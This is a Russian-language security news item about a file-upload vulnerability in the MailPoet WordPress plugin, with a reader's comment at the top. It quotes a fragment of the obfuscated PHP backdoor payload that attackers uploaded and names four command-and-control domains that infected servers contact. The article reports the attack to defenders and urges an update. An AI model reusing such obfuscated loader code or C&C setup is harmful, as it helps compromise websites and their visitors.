Уязвимость в плагине MailPoet позволяет скомпрометировать сайты на WordPress

hacker

Странно, но я ведь не ставил этот плагин.. А wordpress все равно был взломан..

Популярный плагин MailPoet для сайтов под управлением CMS WordPress оказался подвержен уязвимости, позволяющей злоумышленнику загружать файлы на скомпрометированный сайт. Брешь была обнаружена несколько месяцев назад и разработчики MailPoet выпустили исправление, но на некоторых сайтах до сих пор используется уязвимая версия плагина. Об этом сообщает исследователь Sucuri Дэниел Сид (Daniel Cid) в блоге компании.

Уязвимость опасна тем, что хакеры могут взломать учетную запись администратора сайта и получить полный доступ к его содержимому. В связи с этим рекомендуем всем как можно скорее обновить плагин до последней версии 2.6.11. Если это не представляется возможным, воспользуйтесь межсетевым экраном.

Эксплуатируя данную брешь, хакеры получили возможность заражать все сайты, находящиеся на одном web-сервере, если хотя бы один из них использовал уязвимую версию MailPoet. Сид подозревает, что злоумышленники использовали вредоносное ПО, по принципу работы схожее с набором эксплоитов Nuclear.

Для того чтобы получить доступ к сайту, хакер загружает через уязвимую версию плагина MailPoet файл, содержащий следующий случайно сгенерированный пэйлоад. Его код приводится ниже:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"]))  { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);  if ((! strstr($ua,"\x6d\163\x69\145")) and  (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><? php $fiukcmzguy = '%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c4}472%x5c%x7824<!%x5c%x7825 mm!>!#]y81]273]y76]258]y6g5w%x5c%x7860%x5c%x785c^>Ew:Qb:<**2-4- bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x782x7825z>>2*!%x5c%x7825z>3<!fmn>qp%x5c%x7825!|Z~!

После этого происходит соединение с одним из C&C-серверов, доступных по следующим адресам: 33db9538.com, 9507c4e8.com, e5b57288.com, 54dfa1cb.com. Таким образом инфицированный сервер начинает исполнять команды, полученные от С&C-сервера.

Источник: http://www.securitylab.ru/news/459601.php